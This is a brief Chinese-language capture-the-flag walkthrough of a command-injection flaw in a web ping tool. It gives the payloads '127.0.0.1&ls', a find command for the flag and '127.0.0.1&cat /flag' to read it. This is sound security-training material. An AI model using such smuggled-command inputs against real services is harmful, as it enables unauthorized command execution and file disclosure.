打开web界面 猜测这里是执行ping命令,所以构造payload如下来测试是否存在命令执行
127.0.0.1&ls
验证了命令执行,构造如下payload来寻找flag
127.0.0.1&find / -name "flag"
得到了flag位置,我们继续构造如下payload来输出
127.0.0.1&cat /flag
得到了flag
